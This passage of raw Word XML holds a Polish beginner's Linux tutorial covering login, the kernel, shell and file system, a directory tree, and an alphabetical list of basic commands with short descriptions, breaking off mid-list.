          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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LINUX - PODSTAWY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t;&gt; Podstawowe wiadomości &lt;&l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żeli nigdy przed tem nie miałeś styczności z linuxem to przed Tobą bardzo długa droga do osiągnięcia pierwszych sukcesó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mijam tutaj kwestię opisywania instalacji linuxa. Polecam odwołanie się do książek na ten temat albo jeżeli macie taką możliwość, to poproście kogoś ze znajomych, którzy znają się na tym, aby Wam zainstalowali linuxa. Dla początkujących osób polecam zainstalowanie Red Hata 6.1 albo lepsze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żeli mamy już zainstalowanego linuxa to teraz trzeba go dokładnie poznać. Na pierwszy rzut oka, linux przypomina bardzo DOSa, więc jeśli nie miałeś wcześniej z nim problemów, to na pewno sobie poradzisz w linuxie. Najważniejszą rzeczą w linuxie jest to, że bardzo dużą rolę odgrywa zwrócenie uwagi na wielkość liter. Niektóre polecenia przypominają te dosowskie ale mogą znaczyć zupełnie co inne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ierwszą podstawową rzeczą którą powinieneś uczynić to zalogować się na swoje konto, a wygląda to przykładowo ta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elcome to SUN N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un NET login: jerry</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password: &lt;hasło&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="FFFFFF"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;---- w tej linijce wpisujemy swoje hasło </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ale nie widzimy pisanych przez nas lite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żeli w domciu masz zainstalowanego linuxa to podczas instalacji musiałeś podać hasło na roota a wtedy bezpośrednio wpisujesz w linijce login: root a następnie wcześniej zdefiniowane hasło. Dla wyjaśnienia użytkownik root to osoba która jest administratorem serwera. To on przydziela konta, ustawia quote (ilość dostępnego miejsca na czyims koncie) it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stępnie po prawidłowym zalogowaniu widzimy następującą linijkę:</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Last login Wed April 19 2:30:53 on tty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t;jerry@sunnet jerry&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ierwsza linijka informuje nas o tym kiedy ostatni raz zostaliśmy zalogowani na swoje konto (dzień, miesiąc, godzina) i z której konsoli aktualnie piszem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ruga linijka przedstawia nam tzw linuxowski wiersz poleceń. To właśnie z tego miejsca dokonywać będziemy szereg operacji poprzez wpisanie odpowiednich komend it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t;nazwaużytkownika@nazwaserwera katalog&gt;promp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dzie prompty to znak </w:t>
      </w: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xml:space="preserve"> zarezerwowany dla prostego użytkownika, a znaczek </w:t>
      </w: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xml:space="preserve"> dla root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K! Jesteśmy już na swoim koncie. Teraz zapoznamy się z komponentami linux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Linux składa się z trzech komponentów: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>kernel</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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>system plików</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> gdz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KERNEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> główne jądo systemu, zarządza pamięcią, systemem plików oraz programowymi i sprzętowymi urządzeniami. Zawiera tez jezyk niskiego poziomu, shell obsługujący (utrzymującym) proces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SHELL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> jest to język wysokiego poziomu, który może być używany do wykonywania koment systemu, lub też jako język programowania, do pisania skomplikowanych skryptó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o standardowych unixowych shelli zaliczam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in/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in/bash (Bourne-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in/sh (Bourne-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in/csh (C-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in/ksh (Korn-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in/tcsh</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in/zs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SYSTEM PLIKÓW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> możemy przedstawić w trzech kategoria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katalogi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (directorie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pliki pospolite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ordinary file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pliki specjalne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (d, -, l, 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to przykład struktury systemu plikó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sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>(root directory)</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      |     |     |     |      |     |            |     |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dev  /proc  /etc  /bin  /lib  /home  /mnt  /lost+found  /usr  /tmp /roo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     |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httpd   /ftp  /jerry    /others</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public_html</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      |     |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bin  /dev   /etc  /lib  /pub</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główny katalog (root director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dev</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awiera pliki dla fizycznych urządzeń, takich jak drukarka, twardy dysk, cdrom czy karta muzyczn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pro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iezbędny dla komendy p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et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awiera niezbędne (ale nietylko) pliki konfiguracyjne systemu n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tc/grou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tc/lilo.con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tc/passw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tc/inetd.con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tc/shadow</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tc/service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itp. it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bin</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ykonywalne narzędzia systemow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lib</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biblioteki run-tim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hom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atalog domowy, użytkownicy systemu it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mn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używany jako punkt do przyłączania (mounting) np: innego dysku, cdrom'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zy też innego systemu plikó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lost+foun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atalog używany przez program fsc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us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rzedzia i aplikacj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tm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atalog dla plików tymczasow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roo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katalog własny nadzorcy systemu</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lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Skoro już wiemy co to jest kernel, shell i system plików, to teraz czas na przedstawienie podstawowych poleceń w linuxie.</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at [czas] [data] &lt; [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- wykonanie czynności w zadanym czasie</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awk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - język służący do przetwarzania plików tekstowych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cal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetlenie kalendarz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cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmiana katalogu bieżącego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 xml:space="preserve">cat [plik] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- wyświetlenie zawartości plik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chfn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmienia informacje finger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chown [nick] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmiana właściciela plik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chmod [mode] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmiana atrybutów plik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clear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - czyszczenie ekran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cmp [plik] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - porównanie zawartości dwóch plików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cp [plik] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- kopiowanie plik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date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetla bieżącą datę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df</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - pokazuje ilość wolnego miejsca na dysk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diff [plik] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - stwierdzenie, czy między zawartością dwóch plików </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   występują różnice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echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetla tekst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find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - odszukanie plików spełniających określone warunki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finger [username]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - informacje o użytkowniku bądź użytkownikach serwera </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  zdalnego lub lokalnego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ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - przesyłanie plików między komputerami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gcc [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kompilator języka C, standardowo tworzy plik a.out, chyba, </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> że podamy inną nazwę po opcji -o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g++ [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kompilator języka C++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grep [wyraz] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - znalezienie ciągów znaków w pliku (plikach)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gunzip [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - dearchiwizacj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help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - pomoc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irc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uruchomienie klienta IRC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joe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - edytor tekst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kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zakończenie pracy procesu/demon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last [użytkownik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - sprawdzenie logów użytkownik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lastcomm [użytkownik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - sprawdzenie, co ostatnio robił użytkownik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ln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - dowiązanie pliku do innego plik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ln -s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - dowiązanie symboliczne pliku do innego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logout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wylogowanie się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ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetlenie zawartości katalog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lsmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - lista modułów załadowanych w pamięci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mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wysyłanie i odbieranie poczty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make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - skompilowanie aplikacji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man [polecenie]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - szegółowa pomoc na temat konkretnego poleceni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mesg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zablokowanie/odblokowanie przesyłania komunikatów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mkdir [katalog]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - tworzenie katalog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mount [/dev/urządzenie] [katalog]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - montowanie nowego urządzeni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mv [plik] [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - przeniesienie/zmiana nazwy plik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netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - informacje o połączeniach sieciowych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passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmiana hasła użytkownik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pico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - edytor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ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - lista procesów użytkownik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ps -aux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - lista wszystkich procesów w systemie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pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetlenie nazwy aktualnego katalog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rlogin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - praca zdalna na innym komputerze, autoryzacja poprzez plik </w:t>
        <w:tab/>
        <w:t xml:space="preserve">   .rhosts /hosts.equiv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rm [plik]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kasuje plik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rmdir [katalog]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kasuje katalog (tylko, gdy jest pusty)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rsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Remote shell, wykonanie polecenia na innym komputerze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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ustawienie zmiennych SET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screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uruchomienie procesu w tle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size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyświetla wielkości plików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sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zawieszenie procesu na określoną liczbę sekund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shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - restart komputer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startx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uruchomienie graficznej nakładki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 xml:space="preserve">users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- lista uzytkowników aktualnie pracujących w systemie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talk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - program do prowadzenia rozmów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telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zdalna praca na innym komputerze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touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zmiana czasu modyfikacji plik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umount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - odmontowanie urządzeni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vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - prosty edytor, dostępny w każdej implementacji UNIX'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vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - prosty edytor, j.w.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w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - użytkownicy w systemie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wall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - przesyłanie komunikatów do wszystkich użytkowników systemu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who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - użytkownicy w systemie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write [login] [term]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
